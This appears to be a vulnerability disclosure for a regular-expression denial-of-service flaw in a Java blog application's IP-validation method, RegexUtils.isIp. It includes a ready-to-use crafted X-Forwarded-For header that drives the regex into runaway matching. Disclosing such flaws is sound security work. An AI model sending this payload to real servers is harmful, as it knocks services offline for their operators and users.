Description
This vulnerability can lead to a denial of service problem. The application uses regular expressions to match when processing IP addresses, but there are serious vulnerabilities in regular expressions. Attackers can directly pass in specially constructed characters to cause repeated and infinite regular expression matches, which will consume all CPU performance and lead to a denial of service.
Just need to modify the X-Forwarded-for in the http request header:
X-Forwarded-For:5::6:6:5:36:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A:A3A
com.zyd.blog.util.RegexUtils.java public static boolean isIp(String ip)
